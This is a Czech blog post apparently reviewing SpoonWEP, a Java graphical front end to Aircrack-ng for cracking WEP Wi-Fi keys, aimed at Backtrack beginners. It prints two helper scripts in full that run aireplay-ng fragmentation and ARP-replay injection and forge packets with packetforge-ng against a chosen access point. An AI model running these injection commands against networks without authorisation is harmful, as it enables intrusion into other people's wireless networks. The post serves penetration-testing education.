SpoonWEP GUI WiFi Hacking Tool

WEP crack Nástroje na prolamování zabezpečení bezdrátových sítí, testování zranitelností a penetrační testy nezaznamenávají časté přírustky. O to větší nadšení zavládne v momentu kdy světlo světa spatří nějaká novinka nebo proof-of-concept. Dnes vám představíme jednoduchý grafický nástroj, kterého tvůrcem je autor nástroje Charon, o kterém se na airdump.cz psalo začátkem května. SpoonWEP je prográmek napsaný v Java a stejně jako Windows aplikace AiroWizard nebo již zmiňovaný Charon, jde „pouze“ o obal (nebo-li grafickou nástavbu) pro crackerský balík Aircrack-ng (airodump, aireplay, aircrack). Pouze jsem napsal záměrně, ano vím a fórum je toho důkazem, že i několik jednoduchých příkazů může uživately nadělat vítr. Tím se zároveň dostávame k tomu, že aplikace je primárně určena pro každého kdo dělá s penetrační distribuci Backtrack nebo WiFiSlax první kroky.

diskuze aireplay

Celá aplikace je naprogramována, nebo spíše sestavena z několika jednoduchých skriptů, odsah frag.sh

APMAC=$1
CLIMAC=$2
CARD=$3
INJ=$4
ARP=“/tmp/arprequest“

sleep 2
cd /tmp

rm -f /tmp/*.cap;rm -f /tmp/*.xor;rm -f $ARP

aireplay-ng -F -x $INJ -m 144 -5 -b $APMAC -h $CLIMAC $CARD && xor=$(ls /tmp/*.xor)

packetforge-ng -0 -a $APMAC -h $CLIMAC -k 255.255.255.255 -l 255.255.255.255 -y $xor -w $ARP

aireplay-ng -F -x $INJ -2 -r $ARP -h $CLIMAC $CARD

..obsah souboru arp.sh

APMAC=$1
CLIMAC=$2
CARD=$3
INJ=$4

sleep 2
cd /tmp

rm -f /tmp/*.cap;rm -f /tmp/*.xor;

aireplay-ng -x $INJ -3 -b $APMAC -h $CLIMAC $CARD

..jako celek je ale spoonwep mocný nástroj, na kterém lze studovat proces automatizace. Dostupnost skriptů i pochopení základů pro psaní shell kódu. Pár screenshotů pro doplnění informací.

Konfigurační okno aplikace. Ze seznamu síťových karet vybart rozhraní bezdrátové karty které bude v aplikaci použita pro scan wifi sítí a injekci provozních dat. Třetí volba Mód je volitelná a lze ji změnit ještě v následujícím kroku.
konfigurace spoonwep

Další panel slouží pouze k identifikaci bezdrátoví sítě a klienstkého zařízení.
Sppon WEP carck

Předposlední panel umožňuje zvolit jeden z útoků, možnost provést útok na WEP klíč v módu klient i v módu bez klientského zařízení.
Spoon WEP útok

Aplikace bude na požádaní přídána do české lokalizace live CD Backtrack mod. Pro stávající uživatele českého CD, DVD nebo USB je aplikace ke stažení v members area ve Fóru AirDump.cz (nutná registrace).

Kam dál?